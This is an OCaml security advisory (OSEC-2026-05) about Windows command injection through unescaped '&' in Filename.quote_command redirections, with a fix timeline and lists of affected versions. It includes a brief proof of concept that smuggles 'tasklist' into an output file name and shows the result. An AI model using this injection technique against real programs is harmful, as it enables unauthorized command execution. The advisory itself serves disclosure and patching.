OSEC-2026-05

See a problem?
Import Source
https://github.com/ocaml/security-advisories/blob/generated-osv/2026/OSEC-2026-05.json
JSON Data
https://api.osv.dev/v1/vulns/OSEC-2026-05
Aliases
  • CVE-2026-41083
Published
2026-06-18T13:45:00Z
Modified
2026-06-18T14:26:26.886874Z
Severity
  • 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N CVSS Calculator
Summary
Windows command execution via filename quotes.
Details

The quoting of stdin/stdout/stderror (using Filename.quote_command) on Windows is not sufficient, and allows the & character to be passed through. This allows an attacker to inject a shell command if they can specify the stdin/stdout/stderr of a program to be executed.

Exploit

$ opam exec -- ocaml
OCaml version 4.14.2
Enter #help;; for help.

# let outfile = "x&tasklist" in
  let cmd = Filename.quote_command "netsh.exe" ~stdout:outfile ["help"] in
  ignore (Sys.command cmd)
  ;;

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0        168 K
Secure System                  236 Services                   0    191,468 K
Registry                       276 Services                   0      3,428 K
smss.exe                       608 Services                   0      1,676 K
csrss.exe                      984 Services                   0      5,928 K

Timeline

  • 2026-06-18 release of this security advisory
  • 2026-06-15 release of OCaml 4.14.4
  • 2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853
  • 2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org
Database specific 
{
    "human_link": "https://github.com/ocaml/security-advisories/tree/main/advisories/2026/OSEC-2026-05.md",
    "cwe": [
        "CWE-78"
    ],
    "osv": "https://github.com/ocaml/security-advisories/tree/generated-osv/2026/OSEC-2026-05.json"
}
References
Credits
    • Andrew Nesbitt - REPORTER
    • David Allsopp - REMEDIATION_DEVELOPER
    • Florian Angeletti - REMEDIATION_REVIEWER
    • Hannes Mehnert - COORDINATOR

Affected packages

opam / ocaml

Package

Name
ocaml
Purl
pkg:opam/ocaml

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.14.4
Type
ECOSYSTEM
Events
Introduced
5
Fixed
5.5.0
Type
GIT
Repo
https://github.com/ocaml/ocaml
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
ce6d0f7b67145debec57e296dcc49d8619259198
Type
GIT
Repo
https://github.com/ocaml/ocaml
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
39d3f110eab62ab9f3013bb5f084af2dc3e3bb08
Type
GIT
Repo
https://github.com/ocaml/ocaml
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
d5c65dc0034fbd75f10c6b54028e8b2740a7b189

Affected versions

3.*
3.07
3.07+1
3.07+2
3.08.0
3.08.1
3.08.2
3.08.3
3.08.4
3.09.0
3.09.1
3.09.2
3.09.3
3.10.0
3.10.1
3.10.2
3.11.0
3.11.1
3.11.2
3.12.0
3.12.1
4.*
4.00.0
4.00.1
4.01.0
4.02.0
4.02.1
4.02.2
4.02.3
4.02.4
4.03.0
4.03.1
4.04.0
4.04.1
4.04.2
4.04.3
4.05.0
4.05.1
4.06.0
4.06.1
4.06.2
4.07.0
4.07.1
4.07.2
4.08.0
4.08.1
4.08.2
4.09.0
4.09.1
4.09.2
4.10.0
4.10.1
4.10.2
4.10.3
4.11.0
4.11.1
4.11.2
4.11.3
4.12.0
4.12.1
4.12.2
4.13.0
4.13.1
4.13.2
4.14.0
4.14.0-alpha1
4.14.0-alpha2
4.14.0-beta1
4.14.0-rc1
4.14.0-rc2
4.14.1
4.14.1-rc1
4.14.2
4.14.2-rc1
4.14.3
5.*
5.0.0
5.0.1
5.1.0
5.1.1
5.1.2
5.2.0
5.2.1
5.2.2
5.3.0
5.3.1
5.4.0
5.4.1
5.4.2
5.5.0-alpha1
5.5.0-alpha2
5.5.0-alpha3
5.5.0-beta1
Other
flambda_fork_point

Ecosystem specific 

{
    "opam_constraint": "ocaml {< \"4.14.4\" | >= \"5\" & < \"5.5.0\"}"
}

Database specific

source 
"https://github.com/ocaml/security-advisories/blob/generated-osv/2026/OSEC-2026-05.json"